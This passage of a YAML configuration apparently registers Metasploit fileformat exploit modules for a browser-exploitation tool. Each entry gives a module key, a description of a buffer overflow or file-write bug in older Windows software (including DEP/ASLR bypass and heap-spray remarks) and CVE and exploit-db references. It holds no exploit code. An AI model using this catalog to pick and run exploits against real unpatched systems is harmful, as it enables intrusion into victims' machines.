- 2009-2484
- - URL
- http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f
- - URL
- http://milw0rm.com/exploits/9209
- - URL
- http://www.exploit-db.com/exploits/9029
path: extensions/metasploit/
class: Msf_module
msf_foxit_reader_filewrite:
enable: true
msf: true
msf_key: windows/fileformat/foxit_reader_filewrite
name: Foxit PDF Reader 4.2 Javascript File Write
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an unsafe Javascript API implemented in Foxit PDF Reader\n\
\t\t\t\t\tversion 4.2. The createDataObject() Javascript API function allows for writing\n\
\t\t\t\t\tarbitrary files to the file system. This issue was fixed in version 4.3.1.0218.\n\
\t\t\t\t\t\n\
\t\t\t\t\tNote: This exploit uses the All Users directory currently, which required \n\
\t\t\t\t\tadministrator privileges to write to. This means an administrative user has to\n\
\t\t\t\t\topen the file to be successful. Kind of lame but thats how it goes sometimes in\n\
\t\t\t\t\tthe world of file write bugs.\n\
\t\t\t"
authors:
- - OSVDB
- "71104"
- - URL
- http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html
path: extensions/metasploit/
class: Msf_module
msf_hhw_hhp_indexfile_bof:
enable: true
msf: true
msf_key: windows/fileformat/hhw_hhp_indexfile_bof
name: HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HTML Help Workshop 4.74\n\
\t\t\t\t\tBy creating a specially crafted hhp file, an an attacker may be able\n\
\t\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-0133
- - BID
- "33189"
- - OSVDB
- "22941"
- - URL
- http://www.exploit-db.com/exploits/10323
- - URL
- http://www.exploit-db.com/exploits/10335
path: extensions/metasploit/
class: Msf_module
msf_msworks_wkspictureinterface:
enable: true
msf: true
msf_key: windows/fileformat/msworks_wkspictureinterface
name: Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThe Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker\n\
\t\t\t\tto execute arbitrary code on a system. By passing a negative integer to the\n\
\t\t\t\tWksPictureInterface method, an attacker could execute arbitrary code on the system\n\
\t\t\t\twith privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6.\n\
\t\t\t\tThis control is not marked safe for scripting, please choose your attack vector carefully.\n\
\t\t\t"
authors:
- - CVE
- 2008-1898
- - OSVDB
- "44458"
path: extensions/metasploit/
class: Msf_module
msf_vlc_modplug_s3m:
enable: true
msf: true
msf_key: windows/fileformat/vlc_modplug_s3m
name: VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an input validation error in libmod_plugin as\n\
\t\t\t\tincluded with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\n\
\t\t\t\tare affected. By creating a malicious S3M file, a remote attacker\n\
\t\t\t\tcould execute arbitrary code.\n\n\
\t\t\t\tAlthough other products that bundle libmodplug may be vulnerable, this\n\
\t\t\t\tmodule was only tested against VLC.\n\n\
\t\t\t\tNOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n\
\t\t\t\tpermanently enable NX support on machines that support it. As such,\n\
\t\t\t\tthis module is capable of bypassing DEP, but not ASLR.\n\
\t\t\t"
authors:
- - CVE
- 2011-1574
- - OSVDB
- "72143"
- - URL
- http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b
- - URL
- http://hackipedia.org/File%20formats/Music/html/s3mformat.php
- - URL
- https://www.sec-consult.com/files/20110407-0_libmodplug_stackoverflow.txt
- - URL
- http://seclists.org/fulldisclosure/2011/Apr/113
path: extensions/metasploit/
class: Msf_module
msf_aol_desktop_linktag:
enable: true
msf: true
msf_key: windows/fileformat/aol_desktop_linktag
name: AOL Desktop 9.6 RTX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found in AOL Desktop 9.6's Tool\\rich.rct\n\
\t\t\t\tcomponent. By supplying a long string of data in the hyperlink tag, rich.rct copies\n\
\t\t\t\tthis data into a buffer using a strcpy function, which causes an overflow, and\n\
\t\t\t\tresults arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "70741"
- - URL
- http://www.exploit-db.com/exploits/16085/
path: extensions/metasploit/
class: Msf_module
msf_ms10_087_rtf_pfragments_bof:
enable: true
msf: true
msf_key: windows/fileformat/ms10_087_rtf_pfragments_bof
name: Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the handling of the\n\
\t\t\t\t'pFragments' shape property within the Microsoft Word RTF parser. All versions\n\
\t\t\t\tof Microsoft Office 2010, 2007, 2003, and XP prior to the release of the\n\
\t\t\t\tMS10-087 bulletin are vulnerable.\n\n\
\t\t\t\tThis module does not attempt to exploit the vulnerability via Microsoft Outlook.\n\n\
\t\t\t\tThe Microsoft Word RTF parser was only used by default in versions of Microsoft\n\
\t\t\t\tWord itself prior to Office 2007. With the release of Office 2007, Microsoft\n\
\t\t\t\tbegan using the Word RTF parser, by default, to handle rich-text messages within\n\
\t\t\t\tOutlook as well. It was possible to configure Outlook 2003 and earlier to use\n\
\t\t\t\tthe Microsoft Word engine too, but it was not a default setting.\n\n\
\t\t\t\tIt appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that\n\
\t\t\t\tMicrosoft will confirm or deny this since Office 2000 has reached its support\n\
\t\t\t\tcycle end-of-life.\n\
\t\t\t"
authors:
- - CVE
- 2010-3333
- - OSVDB
- "69085"
- - MSB
- MS10-087
- - BID
- "44652"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880
path: extensions/metasploit/
class: Msf_module
msf_hhw_hhp_compiledfile_bof:
enable: true
msf: true
msf_key: windows/fileformat/hhw_hhp_compiledfile_bof
name: HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HTML Help Workshop 4.74\n\
\t\t\t\tBy creating a specially crafted hhp file, an an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-0564
- - OSVDB
- "22941"
- - URL
- http://www.exploit-db.com/exploits/1488
- - URL
- http://www.exploit-db.com/exploits/1490
path: extensions/metasploit/
class: Msf_module
msf_feeddemon_opml:
enable: true
msf: true
msf_key: windows/fileformat/feeddemon_opml
name: FeedDemon <= 3.1.0.12 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application\n\
\t\t\t\tis used to import a specially crafted opml file, a buffer overflow occurs allowing\n\
\t\t\t\tarbitrary code execution.\n\n\
\t\t\t\tAll versions are suspected to be vulnerable. This vulnerability was originally reported\n\
\t\t\t\tagainst version 2.7 in February of 2009.\n\
\t\t\t"
authors:
- - CVE
- 2009-0546
- - OSVDB
- "51753"
- - BID
- "33630"
- - URL
- http://www.exploit-db.com/exploits/7995
- - URL
- http://www.exploit-db.com/exploits/8010
- - URL
- http://www.exploit-db.com/exploits/11379
path: extensions/metasploit/
class: Msf_module
msf_ms11_006_createsizeddibsection:
enable: true
msf: true
msf_key: windows/fileformat/ms11_006_createsizeddibsection
name: Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the handling of thumbnails\n\
\t\t\t\twithin .MIC files and various Office documents. When processing a thumbnail bitmap\n\
\t\t\t\tcontaining a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This\n\
\t\t\t\tleads to arbitrary code execution.\n\n\
\t\t\t\tIn order to trigger the vulnerable code, the folder containing the document must be\n\
\t\t\t\tviewed using the \"Thumbnails\" view.\n\
\t\t\t"
authors:
- - CVE
- 2010-3970
- - OSVDB
- "70263"
- - MSB
- MS11-006
- - BID
- "45662"
- - URL
- http://www.microsoft.com/technet/security/advisory/2490606.mspx
- - URL
- http://www.powerofcommunity.net/schedule.html
path: extensions/metasploit/
class: Msf_module
msf_visiwave_vwr_type:
enable: true
msf: true
msf_key: windows/fileformat/visiwave_vwr_type
name: VisiWave VWR File Parsing Vulnerability
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a vulnerability found in VisiWave's Site Survey Report application.\n\
\t\t\t\tWhen processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'\n\
\t\t\t\tproperty (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',\n\
\t\t\t\t'Image'), but if a match isn't found, the function that's supposed to handle this routine\n\
\t\t\t\tends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10]\n\
\t\t\t\tinstruction. This allows attackers to overwrite it with any arbitrary value, and results code\n\
\t\t\t\texecution. A patch is available at visiwave.com; the fix is done by XORing the return value as\n\
\t\t\t\tnull if no match is found, and then it is validated before use.\n\n\
\t\t\t\tNOTE: During installation, the application will register two file handle's, VWS and VWR and allows a\n\
\t\t\t\tvictim user to 'double click' the malicious VWR file and execute code. This module was also built\n\
\t\t\t\tto bypass ASLR and DEP.\n\
\t\t\t"
authors:
- - CVE
- 2011-2386
- - OSVDB
- "72464"
- - URL
- http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html
- - URL
- http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20
path: extensions/metasploit/
class: Msf_module
msf_mediajukebox:
enable: true
msf: true
msf_key: windows/fileformat/mediajukebox
name: Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Media Jukebox 8.0.400\n\
\t\t\t\tBy creating a specially crafted m3u or pls file, an an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "55924"
- - CVE
- 2009-2650
path: extensions/metasploit/
class: Msf_module
msf_microp_mppl:
enable: true
msf: true
msf_key: windows/fileformat/microp_mppl
name: MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
category: Metasploit
description: " \n\
\t\t\t\t\tThis module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based\n\
\t\t\t\tbuffer overflow occurs when the content of a .mppl file gets copied onto the stack,\n\
\t\t\t\twhich overwrites the lpFileName parameter of a CreateFileA() function, and results\n\
\t\t\t\tarbitrary code execution under the context of the user.\n\
\t\t\t"
authors:
- - OSVDB
- "73627"
- - URL
- http://www.exploit-db.com/exploits/14720
path: extensions/metasploit/
class: Msf_module
msf_sascam_get:
enable: true
msf: true
msf_key: windows/fileformat/sascam_get
name: SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThe SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow.\n\
\t\t\t\tBy passing an overly long argument via the Get method, a remote attacker could\n\
\t\t\t\toverflow a buffer and execute arbitrary code on the system with the privileges\n\
\t\t\t\tof the user. This control is not marked safe for scripting, please choose your\n\
\t\t\t\tattack vector carefully.\n\
\t\t\t\t"
authors:
- - CVE
- 2008-6898
- - OSVDB
- "55945"
- - BID
- "33053"
path: extensions/metasploit/
class: Msf_module
msf_fatplayer_wav:
enable: true
msf: true
msf_key: windows/fileformat/fatplayer_wav
name: Fat Player Media Player 0.6b0 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Fat Player 0.6b. When\n\
\t\t\t\tthe application is used to import a specially crafted wav file, a buffer overflow occurs\n\
\t\t\t\tallowing arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "57343"
- - URL
- https://www.exploit-db.com/exploits/15279/
path: extensions/metasploit/
class: Msf_module
msf_mjm_coreplayer2011_s3m:
enable: true
msf: true
msf_key: windows/fileformat/mjm_coreplayer2011_s3m
name: MJM Core Player 2011 .s3m Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in MJM Core Player 2011\n\
\t\t\t\tWhen opening a malicious s3m file in this applications, a stack buffer overflow can be\n\
\t\t\t\ttriggered, resulting in arbitrary code execution.\n\
\t\t\t\tThis exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. \n\
\t\t\t"
authors:
- - OSVDB
- "72101"
- - URL
- http://www.corelan.be/advisories.php?id=CORELAN-11-004
path: extensions/metasploit/
class: Msf_module
msf_wm_downloader_m3u:
enable: true
msf: true
msf_key: windows/fileformat/wm_downloader_m3u
name: WM Downloader 3.1.2.2 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in WM Downloader v3.1.2.2. When\n\
\t\t\t\tthe application is used to import a specially crafted m3u file, a buffer overflow occurs\n\
\t\t\t\tallowing arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "66911"
- - URL
- http://www.exploit-db.com/exploits/14497/
path: extensions/metasploit/
class: Msf_module
msf_adobe_flashplayer_button:
enable: true
msf: true
msf_key: windows/fileformat/adobe_flashplayer_button
name: Adobe Flash Player "Button" Remote Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the handling of certain SWF movies\n\
\t\t\t\twithin versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\n\
\t\t\t\tare also vulnerable, as are any other applications that may embed Flash player.\n\n\
\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\n\
\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\n\
\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\n\n\
\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\n\
\t\t\t\tadobe_libtiff module. This method is unlikely to work across various\n\
\t\t\t\tWindows versions due a the hardcoded syscall number.\n\
\t\t\t"
authors:
- - CVE
- 2010-3654
- - OSVDB
- "68932"
- - BID
- "44504"
- - URL
- http://www.adobe.com/support/security/advisories/apsa10-05.html
- - URL
- http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/
- - URL
- http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/
path: extensions/metasploit/
class: Msf_module
msf_deepburner_path:
enable: true
msf: true
msf_key: windows/fileformat/deepburner_path
name: AstonSoft DeepBurner (DBR File) Path Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in versions 1.9.0.228,\n\
\t\t\t\t1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).\n\
\t\t\t\tAn attacker must send the file to victim and the victim must open the file.\n\
\t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\n\
\t\t\t\tDBR file within a browser, since the DBR extention is registered to DeepBurner.\n\
\t\t\t"
authors:
- - BID
- "21657"
- - OSVDB
- "32356"
- - CVE
- 2006-6665
- - URL
- http://milw0rm.com/exploits/2950
- - URL
- http://milw0rm.com/exploits/8335
- - URL
- http://www.exploit-db.com/exploits/11315
path: extensions/metasploit/
class: Msf_module
msf_acdsee_xpm:
enable: true
msf: true
msf_key: windows/fileformat/acdsee_xpm
name: ACDSee XPM File Section Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in ACDSee 9.0.\n\
\t\t\t\tWhen viewing a malicious XPM file with the ACDSee product,\n\
\t\t\t\ta remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2193
- - OSVDB
- "35236"
- - BID
- "23620"
path: extensions/metasploit/
class: Msf_module
msf_bacnet_csv:
enable: true
msf: true
msf_key: windows/fileformat/bacnet_csv
name: BACnet OPC Client Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SCADA\n\
\t\t\t\tEngine BACnet OPC Client v1.0.24. When the BACnet OPC Client\n\
\t\t\t\tparses a specially crafted csv file, arbitrary code may be\n\
\t\t\t\texecuted.\n\
\t\t\t"
authors:
- - OSVDB
- "68096"
- - BID
- "43289"
- - URL
- http://www.us-cert.gov/control_systems/pdf/ICSA-10-264-01.pdf
path: extensions/metasploit/
class: Msf_module
msf_cain_abel_4918_rdp:
enable: true
msf: true
msf_key: windows/fileformat/cain_abel_4918_rdp
name: Cain & Abel <= v4.9.24 RDP Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24\n\
\t\t\t\tand below. An attacker must send the file to victim, and the victim must open\n\
\t\t\t\tthe specially crafted RDP file under Tools -> Remote Desktop Password Decoder.\n\
\t\t\t"
authors:
- - CVE
- 2008-5405
- - OSVDB
- "50342"
- - URL
- http://www.milw0rm.com/exploits/7329
- - BID
- "32543"
path: extensions/metasploit/
class: Msf_module
msf_subtitle_processor_m3u_bof:
enable: true
msf: true
msf_key: windows/fileformat/subtitle_processor_m3u_bof
name: Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found in Subtitle Processor 7. By\n\
\t\t\t\tsupplying a long string of data as a .m3u file, Subtitle Processor first converts\n\
\t\t\t\tthis input in Unicode, which expands the string size, and then attempts to copy it\n\
\t\t\t\tinline on the stack. This results a buffer overflow with SEH overwritten, allowing\n\
\t\t\t\tarbitrary code execution.\n\
\t\t\t"
authors:
- - URL
- http://sourceforge.net/projects/subtitleproc/
- - URL
- http://www.exploit-db.com/exploits/17217/
path: extensions/metasploit/
class: Msf_module
msf_mymp3player_m3u:
enable: true
msf: true
msf_key: windows/fileformat/mymp3player_m3u
name: Steinberg MyMP3Player 3.0 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When\n\
\t\t\t\tthe application is used to open a specially crafted m3u file, a buffer overflow occurs\n\
\t\t\t\tallowing arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "64580"
- - URL
- http://www.exploit-db.com/exploits/11791
path: extensions/metasploit/
class: Msf_module
msf_adobe_collectemailinfo:
enable: true
msf: true
msf_key: windows/fileformat/adobe_collectemailinfo
name: Adobe Collab.collectEmailInfo() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.\n\
\t\t\t\t\tBy creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call,\n\
\t\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5659
- - OSVDB
- "41495"
path: extensions/metasploit/
class: Msf_module
msf_ideal_migration_ipj:
enable: true
msf: true
msf_key: windows/fileformat/ideal_migration_ipj
name: PointDev IDEAL Migration Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in versions v9.7\n\
\t\t\t\tthrough v10.5 of IDEAL Administration and versions 4.5 and 4.51 of\n\
\t\t\t\tIDEAL Migration. All versions are suspected to be vulnerable.\n\
\t\t\t\tBy creating a specially crafted ipj file, an an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\n\
\t\t\t\tNOTE: IDEAL Administration 10.5 is compiled with /SafeSEH\n\
\t\t\t"
authors:
- - CVE
- 2009-4265
- - OSVDB
- "60681"
- - URL
- http://www.exploit-db.com/exploits/10319
- - URL
- http://www.exploit-db.com/exploits/12403
- - URL
- http://www.exploit-db.com/exploits/12404
- - URL
- http://www.exploit-db.com/exploits/12540
path: extensions/metasploit/
class: Msf_module
msf_djvu_imageurl:
enable: true
msf: true
msf_key: windows/fileformat/djvu_imageurl
name: DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an\n\
\t\t\t\toverly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0)\n\
\t\t\t\tan attacker may be able to execute arbitrary code. This control is not marked safe\n\
\t\t\t\tfor scripting, so choose your attack vector accordingly.\n\
\t\t\t"
authors:
- - CVE
- 2008-4922
- - OSVDB
- "49592"
- - BID
- "31987"
path: extensions/metasploit/
class: Msf_module
msf_ht_mp3player_ht3_bof:
enable: true
msf: true
msf_key: windows/fileformat/ht_mp3player_ht3_bof
name: HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HT-MP3Player 1.0.\n\
\t\t\t\t\tArbitrary code execution could occur when parsing a specially crafted\n\
\t\t\t\t\t.HT3 file.\n\n\
\t\t\t\t\tNOTE: The player installation does not register the file type to be\n\
\t\t\t\t\thandled. Therefore, a user must take extra steps to load this file.\n\
\t\t\t"
authors:
- - CVE
- 2009-2485
- - OSVDB
- "55449"
- - URL
- http://www.milw0rm.com/exploits/9034
- - URL
- http://www.milw0rm.com/exploits/9038
path: extensions/metasploit/
class: Msf_module
msf_vlc_webm:
enable: true
msf: true
msf_key: windows/fileformat/vlc_webm
name: VideoLAN VLC MKV Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an input validation error in VideoLAN VLC\n\
\t\t\t\t< 1.1.7. By creating a malicious MKV or WebM file, a remote attacker\n\
\t\t\t\tcould execute arbitrary code.\n\n\
\t\t\t\tNOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n\
\t\t\t\tpermanently enable NX support on machines that support it.\n\
\t\t\t"
authors:
- - OSVDB
- "70698"
- - CVE
- 2011-0531
- - BID
- "46060"
- - URL
- http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456
- - URL
- http://www.videolan.org/security/sa1102.html
path: extensions/metasploit/
class: Msf_module
msf_altap_salamander_pdb:
enable: true
msf: true
msf_key: windows/fileformat/altap_salamander_pdb
name: Altap Salamander 2.5 PE Viewer Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Altap Salamander <= v2.5.\n\
\t\t\t\t\tBy creating a malicious file and convincing a user to view the file with\n\
\t\t\t\t\tthe Portable Executable Viewer plugin within a vulnerable version of\n\
\t\t\t\t\tSalamander, the PDB file string is copied onto the stack and the\n\
\t\t\t\t\tSEH can be overwritten.\n\
\t\t\t"
authors:
- - CVE
- 2007-3314
- - BID
- "24557"
- - OSVDB
- "37579"
- - URL
- http://vuln.sg/salamander25-en.html
path: extensions/metasploit/
class: Msf_module
msf_adobe_illustrator_v14_eps:
enable: true
msf: true
msf_key: windows/fileformat/adobe_illustrator_v14_eps
name: Adobe Illustrator CS4 v14.0.0
category: Metasploit
description: "\n\
\t\t\t\t\tAdobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)\n\
\t\t\t\toverlong DSC Comment Buffer Overflow Exploit\n\
\t\t\t"
authors:
- - CVE
- 2009-4195
- - BID
- "37192"
- - OSVDB
- "60632"
- - URL
- http://retrogod.altervista.org/9sg_adobe_illuso.html
- - URL
- http://www.exploit-db.com/exploits/10281
path: extensions/metasploit/
class: Msf_module
msf_ezip_wizard_bof:
enable: true
msf: true
msf_key: windows/fileformat/ezip_wizard_bof
name: eZip Wizard 3.0 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow vulnerability in\n\
\t\t\t\tversion 3.0 of ediSys Corp.'s eZip Wizard.\n\n\
\t\t\t\tIn order for the command to be executed, an attacker must convince someone to\n\
\t\t\t\topen a specially crafted zip file with eZip Wizard, and access the specially\n\
\t\t\t\tfile via double-clicking it. By doing so, an attacker can execute arbitrary\n\
\t\t\t\tcode as the victim user.\n\
\t\t\t"
authors:
- - CVE
- 2009-1028
- - OSVDB
- "52815"
- - BID
- "34044"
- - URL
- http://www.edisys.com/
- - URL
- http://www.exploit-db.com/exploits/8180
- - URL
- http://www.exploit-db.com/exploits/12059/
path: extensions/metasploit/
class: Msf_module
msf_aol_phobos_bof:
enable: true
msf: true
msf_key: windows/fileformat/aol_phobos_bof
name: AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.\n\
\t\t\t\tBy setting an overly long value to 'Import()', an attacker can overrun a buffer\n\
\t\t\t\tand execute arbitrary code.\n\n\
\t\t\t\tNOTE: This ActiveX control is NOT marked safe for scripting or initialization.\n\
\t\t\t"
authors:
- - OSVDB
- "61964"
- - URL
- http://www.exploit-db.com/exploits/11204
- - URL
- http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/
path: extensions/metasploit/
class: Msf_module
msf_videospirit_visprj:
enable: true
msf: true
msf_key: windows/fileformat/videospirit_visprj
name: VeryTools Video Spirit Pro <= 1.70
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Video Spirit <= 1.70.\n\
\t\t\t\tWhen opening a malicious project file (.visprj), a stack buffer overflow occurs,\n\
\t\t\t\tresulting in arbitrary code execution.\n\
\t\t\t\tThis exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.\n\
\t\t\t"
authors:
- - CVE
- 2011-0499
- - CVE
- 2011-0500
- - OSVDB
- "70619"
- - URL
- http://www.corelan.be/advisories.php?id=CORELAN-11-001
path: extensions/metasploit/
class: Msf_module
msf_destinymediaplayer16:
enable: true
msf: true
msf_key: windows/fileformat/destinymediaplayer16
name: Destiny Media Player 1.61 PLS M3U Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.\n\
\t\t\t\t\tAn attacker must send the file to victim and the victim must open the file. File-->Open Playlist\n\
\t\t\t"
authors:
- - CVE
- 2009-3429
- - OSVDB
- "53249"
- - URL
- http://www.milw0rm.com/exploits/7651
- - BID
- "33091"
path: extensions/metasploit/
class: Msf_module
msf_xenorate_xpl_bof:
enable: true
msf: true
msf_key: windows/fileformat/xenorate_xpl_bof
name: Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Xenorate 2.50\n\
\t\t\t\tBy creating a specially crafted xpl file, an an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "57162"
- - URL
- http://www.exploit-db.com/exploits/10371
path: extensions/metasploit/
class: Msf_module
msf_ursoft_w32dasm:
enable: true
msf: true
msf_key: windows/fileformat/ursoft_w32dasm
name: URSoft W32Dasm Disassembler Function Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in W32Dasm <= v8.93.\n\
\t\t\t\tBy creating a malicious file and convincing a user to disassemble\n\
\t\t\t\tthe file with a vulnerable version of W32Dasm, the Imports/Exports\n\
\t\t\t\tfunction is copied to the stack and arbitrary code may be executed\n\
\t\t\t\tlocally as the user.\n\
\t\t\t"
authors:
- - CVE
- 2005-0308
- - OSVDB
- "13169"
- - BID
- "12352"
- - URL
- http://aluigi.altervista.org/adv/w32dasmbof-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_ultraiso_ccd:
enable: true
msf: true
msf_key: windows/fileformat/ultraiso_ccd
name: UltraISO CCD File Parsing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in EZB Systems, Inc's\n\
\t\t\t\tUltraISO. When processing .CCD files, data is read from file into a\n\
\t\t\t\tfixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n\
\t\t\t\tcan occur. Attackers can execute arbitrary code by convincing their victim\n\
\t\t\t\tto open an CCD file.\n\n\
\t\t\t\tNOTE: A file with the same base name, but the extension of \"img\" must also\n\
\t\t\t\texist. Opening either file will trigger the vulnerability, but the files must\n\
\t\t\t\tboth exist.\n\
\t\t\t"
authors:
- - CVE
- 2009-1260
- - OSVDB
- "53275"
- - BID
- "34363"
- - BID
- "38613"
- - URL
- http://www.exploit-db.com/exploits/8343
path: extensions/metasploit/
class: Msf_module
msf_zinfaudioplayer221_pls:
enable: true
msf: true
msf_key: windows/fileformat/zinfaudioplayer221_pls
name: Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.\n\
\t\t\t\tAn attacker must send the file to victim and the victim must open the file.\n\
\t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\n\
\t\t\t\tPLS file within a browser, when the PLS extention is registered to Zinf.\n\
\t\t\t\tThis functionality has not been tested in this module.\n\
\t\t\t"
authors:
- - CVE
- 2004-0964
- - OSVDB
- "10416"
- - URL
- http://www.milw0rm.com/exploits/7888
- - BID
- "11248"
path: extensions/metasploit/
class: Msf_module
msf_digital_music_pad_pls:
enable: true
msf: true
msf_key: windows/fileformat/digital_music_pad_pls
name: Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4\n\
\t\t\t\tWhen opening a malicious pls file with the Digital Music Pad,\n\
